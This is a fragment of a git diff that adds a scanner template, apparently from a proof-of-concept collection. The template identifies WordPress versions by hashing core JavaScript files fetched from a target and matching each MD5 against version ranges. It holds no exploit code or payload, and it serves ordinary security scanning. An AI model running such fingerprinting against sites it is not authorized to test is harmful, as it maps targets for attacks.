3.6.1 + dsl: + - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a6b1f0f1180e40f7847a2a6d660da570\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"eb111877acfda6a2831ec64cca27e9d3\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"6ddb95e5911a96be8c8166011db91383\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c323cf4339706987ff20d5d06c3b95cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-auth-check.min.js" + matchers: + - type: dsl + name: 4.5 - 5.2.9 + dsl: + - "(\"99c97a7d6ad9e1ba06bbd76f29ecaad6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"49773ca795f07b9a6f04caacd4ebc61b\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"4584099c38e5ed5f6f44644a79b6e473\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.1.32 + dsl: + - "(\"b7a95205254b5b44d7da6c40feee0f71\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"9381710ce753b9832b1a2c698862ab3b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"616c48c103a3090c52f6fbe7e4df4e97\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"1c475b507eb2f1d6e2086c0bff58852b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6283adf848ff1848a76894050e791263\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c5999da6ac39a9e88a807571df55eeb6\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"2264f035cf3f6ab020bf1b40421184f3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c27f3884d55cb48bd02574d49fd9fdfb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"29e8d4a7d3c7c16432b99a053c7a5df5\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"4ec2ae66360aa0edc72274ea7188309a\" == md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"172f499d40d4217bbf684cd552031acb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"61be6f278a1f944b26447cdc26d835fe\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"5ef59229c14589b9cfa643363e830068\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b0934f29dd7066a46581e8e3e260610b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"45bb1424ed1b5b1d133a043b26b235ca\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f888c34433b712f06e43af40429ba9d4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"17907e9882677f339e16eb884c1295e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/color-picker.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"2e3a1f2a0ac299060d3c853e61d002b0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e6aa90b2182ca576285b067a632ab0c6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"cf27af726c42ff82f96aa6b5d6c50936\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"1aa57d225b7d9bb8bfa8500e0c2de029\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5e6cb3e8e3774341f4a81ae60ff240ba\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"d25e49828f69f88f952f7901ea23cd12\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0700f055de0f02747e6bf5b1ecd2d362\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9bee909f1eff9d9228caf7768440f935\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f928ad0829d1c05c2c2d2a46acbbc3db\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"fb9ae1cb65eb001aa159656e525946af\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"ca1331e8606d08cddd3db4a1c50a0625\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d8c89846a5bc52ad623c42aad0eede4c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fe70ea8607c181a61c44bdbfe9a86bdf\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fbaf1efbbfa3d66fbbe551c04f55c274\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9fc10081b896d90cb84e953e4a273e91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"dde9127de4c2995fc434b200f0dd615b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"75c601c64c8582af3fd5501adf8a70df\" == md5(body))" + - type: dsl + name: 4.4.2 - 4.4.24 + dsl: + - "(\"83826163165ed1d49e8f3c6618d48c32\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.1 + dsl: + - "(\"8d376028d50307c5c478fb47e8573d09\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"31c678bb877b9fcfc08ee557a06bcef8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4aa2a2e6ee60243f003d3ebb47edf4b4\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.1.32 + dsl: + - "(\"fb20ee6486993251b2345d7f10679170\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"6b10931419d409bc0e4dc2b985d93fad\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"e152c4564839eea5d03f5c1f8f7f3304\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f51e5bb7e388108cdbb09e73dab882b0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"1e857c903f02b235ee15d338e578e0b0\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"276a51688f82154e668da8ccc2664360\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"8f644169a9fbdc883848e5045955e43f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6df2176e4c845dae0a4798bfbe503380\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ce0ac0de288078af8c9421bd2e7fcb86\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"5b6cf02e1847560c7c2708b9cec8333c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5828c84d341a897ddba6d7c1a7074a26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"5d779b1702467d3ff8daf053f809a602\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"c3920f8399e5369fa7477612b192a85b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"24b30b63b51ccaea07d4f8c13f058032\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9e3439b2b5d41797f67e6c4f4d0f17a3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7a8cf8a6366e2a07ece9aa4ca4a8baba\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"19bd4858dd4636e58e5bf1b4c55886a7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"c4e88d5a0c0ee055cc792ceedf20ad48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"625f3147b42809ded504e0aaba0d69e4\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"78da87ac01615efd1b9087de60c6e18e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"1a99537df5afe33ad7972ed385716c03\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a53c355041b61b5a9c030e21be5f2447\" == md5(body))" + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"f052c91aba8f3eb8d7418730e2571096\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c9fdf1db2027922e9bbdcd77dac6fb8b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"eeb709706143ea4420b07cef572a7e85\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"14c91445e03a47d7f18294fcd1181ac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-install.min.js" + matchers: + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"667fcfc5babfffd925f42a9347a0f7ff\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"60cae9c8d9cb09c304baddd7b3c79486\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"07ffbac3f2ba98be80444078bf478e06\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"50874b301967fa5cf16245d209ebee6c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"920192c0f83cb413dcbd4c2d8907496d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8acc18afc849d02b6fd4050074a93a9b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b17d4faeeed1f4def3a3622c3f5fdb84\" == md5(body))" + - type: dsl + name: 3.7 - 3.9.33 + dsl: + - "(\"4bbf055e4673e39953b716ac908a0abf\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"17da53aeae6cc8d61bed50c2ab38c209\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"31d9f8e828b08e3de1c3922fd12161ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4c72237dfde5e31f0c2d759ce3cac520\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"07da3b1185906661024d9b4162b39c4a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"2d180d2fcea4d807be0600d25b2dc34a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"82e54a4c50d795de58583bc8c3c5366c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1204a65bdca9b53b11e21b0a4006fed0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"6d7aedb2931f1728e3052ad0916e890f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c872a6fb39d1e2392723b32871311ccb\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"2eac88d29658e3be60fb3502410e1d18\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f82ef9ea2e66e725aca286df49f09644\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"dd9397747816f2234cd21d2f9d1a50f8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"5d8bdcb7dfef4c386321eb2e2447a038\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"bd0b29fbd66949b3c771ebc9c7d1b598\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"05b76950045388239de89bcb4043aa4a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"43068dabcf577d41f4e84f59d8586628\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"0bcc3681daa40ee2e0ecee241388a898\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ccea3e2215182f5aac1b63aae392148\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"13024099bcd0d7bb501eaade5ee8509d\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fcc7483e8bc9a333e8e4fe1aeee52504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/shortcode.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b342d56a90b09adfad6d95a4717c0b24\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"82ad4fbf4eb5f246ebcd565b66a00bee\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.3.25 + dsl: + - "(\"18ba5832006079f3bcbdeb4c38c92adf\" == md5(body))" + - type: dsl + name: 3.7 - 3.9 + dsl: + - "(\"94f0a6572dc53376bc73c29e2dbc2d27\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"45b08b8d56d3b5138e2056cda31fd674\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"1c041f7f933a23946e80dc51b5e1c938\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"18e0dd81085ad19822288e41aefbfca9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ac175b8437594f86e5f28bf90a4306bf\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"cff973dcfb4f01f66d15dae46b318d59\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/heartbeat.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"126cc4d1e35b74edb525b06e3788e0f2\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"1a30d2f3f43f2e3fb867298e53cad1a1\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"1dd3c7ed8699b740ebf4040b1304436d\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.0.32 + dsl: + - "(\"ce0f4c41502115dd456d8fe69ad9d6a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"1ea138dbe250685292d30ac37620acfc\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9aae6231a46e14ac89912dba8c94625f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"291eec7c9016045eab556f6cd9e988fd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"364c2b9d670cdf41e827a627eb11b04b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"37ce90356b4d2587270f9f9fce795035\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1b189a9d958d638c3bd1459ab6d19f8d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f860581fb8612b68fa2503e50422b737\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f44e97b62fc8a3a338fcc764a887e455\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.min.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"4e7b25e9bc3374cf391d5a652651a277\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.3.25 + dsl: + - "(\"1c986fe3039dbacf126de2f0dc644f6f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"b54be68c89acf61cb65c5a6be0afd68d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"7f4fb19184e149d7c0578c37983a258b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"a0128dff24056e6476db0cf96ed23139\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"501eb34a56ce4495a13d4e467916955d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"cacc448a4e2a324a23bb2b00fccc994e\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"09225ccd5df14b041aa451535d952d0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.min.js" + matchers: + - type: dsl + name: 4.6.6 - 5.2.9 + dsl: + - "(\"a08d4288293bfbcd0d198f7aa3eda619\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.4 + dsl: + - "(\"3ea40ab7c27b75d20c3da22f097d6614\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.5.23 + dsl: + - "(\"11bf2f04087fa26d73fe609aea0deb5c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.8 + dsl: + - "(\"813ceb60612a365924d271704d03d95c\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.17 + dsl: + - "(\"e10ed46fab9c2698e592308ef1bc1274\" == md5(body))" + - type: dsl + name: 3.9.19 - 4.1.32 + dsl: + - "(\"a4ceb21a21b2f7387cda6aa3987fbe5d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"ddf4c7760bc883551c7c624c96366b2c\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.33 + dsl: + - "(\"5134fc8ba506fcb19b83f48e00f13173\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - "(\"7f22f0ade68c07f94df3b40a9ab01632\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.33 + dsl: + - "(\"d784d1950872d6bf872f285bcf801def\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"ea290fe2e1a4d1d6433f46636417c28a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"d672c9820c43194fc1d0b7536ec55bc9\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"0af080d323b400286d6b6c1ce141abfc\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ae0fb9c92bfd8b294508118aa3a9f7d5\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"9164287a9d6da8155bcdd5888fbcab4f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"07da0a8acb054283d518eef97bbbd180\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f881f44197fe880cb2257955d66a167f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"030df1f8550983eeb6f34ff46bfd8d7b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"a80e641bb281235d159937ecd5b8393f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2fa48561beb42a5197c7e4dbb812d9b8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"9c5d52b7116f10e4f64a766649725752\" == md5(body))" + - type: dsl + name: 4.2.4 - 4.2.29 + dsl: + - "(\"6878c388ff6f0063e6c31d0d3b28ecdb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.3 + dsl: + - "(\"e2fe94b081c4f0bb2e673b75b2d72b23\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.1.32 + dsl: + - "(\"27f1093ab09c8fe7c9e5eeed62525b41\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.1 + dsl: + - "(\"c5307758e7cda56b18b721eaad458db6\" == md5(body))" + - type: dsl + name: 3.9.4 - 3.9.33 + dsl: + - "(\"1bf86ac908560d0942c89fa5bb260ac1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.3 + dsl: + - "(\"e5ab45817f930b0542eb4efe964ca1d6\" == md5(body))" + - type: dsl + name: 3.8.6 - 3.8.33 + dsl: + - "(\"2dbeb77845c920d2a43089badf02558d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.5 + dsl: + - "(\"8c02fa2ffa234c96ba76341532da142e\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.7.33 + dsl: + - "(\"f8c1f1f9fdc67b64689ad8cb43bcd7de\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.5 + dsl: + - "(\"5e84057e24cd23183bafd40b381c8ad4\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f93efefe6ca9c827a2ff395f6297cc16\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7a8d1cf1023a40442ca8efc5c8bc6787\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"5169d979fee3b7679953b2b7f434910d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"6ab2461212b35857ae0c979439dd59f1\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"cb52510d41dbe0e748c6f2d4aaaf85ed\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5b46976c3745c39d14e55e06067a8373\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"46a432b956c0aa599d0661076c636988\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b8da6794ad8af3a4ffc0dab408d5a8a0\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"3a392ddb8a382f78215c8d3c5d34d422\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"88fd998db24c3ce51b47c2e00e95db67\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"3498b476348ae4d361dc02e197203990\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"cd36cae0d297bfcc3bb4884f539d9840\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ad896ee63ddc505b6e098f6d308fdcef\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f01e2f651ed5d26422e4f5edbb3548aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"7bb6e432495c6711766e3c395ee95b01\" == md5(body))" + - type: dsl + name: 3.2 - 3.6.1 + dsl: + - "(\"0f132c90124ed40d6df71f1d4fabe557\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9530e2e519bd75ba1748656ee1d2aa12\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"c3385371567df30afda2c9a49129bb5e\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"8f4bf29880b0cccbddfdcf1688c93622\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.min.js" + matchers: + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d6a88a01bdc839e38c5a25c3533d32c4\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"3534e4ec4ef74d6a8daafa225c11c918\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ae2adb4cebb8b6c3dd3cc87b51c5061a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"a5f47f22759ae243dd731c1b8a7f0495\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"1431f5bb512892f9e9f39a8d7ece041c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e31f737d7be3c5c6014934ccd445b808\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"8d70b30ab1e79965258c2244cb06040a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fd051b6fe06fa0636fefa788eeec7725\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/revisions.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"0886448d087ccc0cb432130320821f69\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"189a4d84349fe1f4dfa0ec48c82efb04\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"62b95e8d4f6d5dc32797b9f08339446e\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"3253906cffe4523bc05d0632af4c6af8\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5cff0abc8bb329e36a744280b563e9da\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"06c4a5b77bd61413bc4b74d88bfe9012\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"32caf54248666d9ff6666ae57d66cc09\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"2e3fc3b910c3ffa7dd0bd1b939f955a0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"53d6b76b1495528760964cb5414167df\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d1587acf93ef6d0fc64758d984f50d56\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dfd2373522730d2d80e1437af0e38df2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"1fb7a1551bbc89fa0b13cf037997832c\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"540ab4f75671456980a28d78f48c8587\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.min.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"f371f1d8aef9c3cb12cbdfa97cf7bd2f\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"6a365c2fcd52566ae9fd3db9a28c673d\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"fa5d97a49168b7454a06fa0e195fce4d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"0d7a0005ba6a1fa29037258ddd1a2034\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d8427236a194f26c0902c12b3235cc60\" == md5(body))" + - type: dsl + name: 3.9 - 4.0 + dsl: + - "(\"8dd40bc29c66e85694b8b55f8489238a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"f1264b60d66121394ec5833588826155\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"5f7c8cb8f33b0e319d7ede4a8eb97ee3\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"3acba502428f381b73603c025c96b37a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d93d32c5f16e2b5169f5d2118cb58d08\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"ed0bdd8e94c8119ba32f0cccb0fa6ee3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8d703bfea23a93f5679e25d60ef16593\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"47c0382048df8a6ea5e976e3b33a630c\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"0afb211552df727de680e1ba9b67e4fb\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"29ee8f15afeff636713ca503e8a39250\" == md5(body))" diff --git a/poc/wordpress/wp-ambience-xss-11407.yaml b/poc/wordpress/wp-ambience-xss-11407.yaml new file mode 100644 index 0000000000..d79af60651 --- /dev/null +++ 